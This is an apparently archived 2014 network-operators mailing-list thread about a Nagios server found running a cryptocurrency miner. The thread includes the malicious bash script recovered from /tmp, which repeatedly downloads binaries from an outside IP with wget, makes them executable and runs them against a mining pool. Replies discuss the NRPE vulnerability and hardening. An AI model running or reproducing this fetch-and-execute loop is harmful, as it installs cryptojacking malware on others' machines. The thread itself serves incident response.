Hi Tom, Yeah, see this:
http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability and this from a reply to the abuse email of the IP address range used: http://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/ Thanks. On 21 April 2014 16:04, Tom Storey <[email protected]> wrote: > Probably also worth making /tmp noexec so that stuff like this has a > harder time getting started. > > On 20 April 2014 20:14, Gary Steers <[email protected]> wrote: >> All, >> >> This looks like its some form of crypto currency miner "xptMiner.exe", think >> that ones a RieCoin one... >> >> Undoubtedly the servers in use are compromised in some way but may be worth >> an abuse message to the contact on the RIR record in whois? >> >> Gavin, have sent you an e-mail off topic as well with a little more info, >> hope it was useful. >> >> --- >> Gary Steers >> Chief Network Engineer | Boosty >> >> >> On 20 April 2014 19:56, Gavin Henry <[email protected]> wrote: >>> >>> Hi all, >>> >>> Not usually a post you see on uknof, but wanted some help and to check >>> if anyone else has seen this? >>> >>> We've just started getting alerts from one of our servers for highload >>> and discovered a weird process: >>> >>> nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 >>> bash /tmp/toplel >>> nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ >>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s >>> 2965706752 >>> >>> >>> root@hostname:/tmp# ls -lh >>> total 1016K >>> -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll >>> -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel >>> -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t >>> >>> >>> No idea where it came from. All our stuff has OpenSSL updated as is >>> our Nagios. w00t is a binary, toplel is a bash script containing: >>> >>> #!/bin/bash >>> if [ $1 -le 10 ] ; then >>> NUM = $(expr $1 + 1) >>> nohup bash $0 $NUM >/dev/null 2>&1 & >>> exit >>> fi >>> CORECOUNT=$(cat /proc/cpuinfo | grep -c processor) >>> FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}') >>> FREE=$(expr $FREE - 52428800) >>> FREE=$(expr $FREE / $CORECOUNT) >>> >>> while true; do >>> killall w00t >>> wget http://162.213.24.40/nope-sse4 -O /tmp/w00t >>> chmod 777 /tmp/w00t >>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s >>> $FREE >>> >>> wget http://162.213.24.40/nope-nse4 -O /tmp/w00t >>> chmod 777 /tmp/w00t >>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s >>> $FREE >>> >>> sleep 300 >>> done; >>> >>> >>> >>> -- >>> Kind Regards, >>> Gavin Henry. >>> >> -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E [email protected] Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
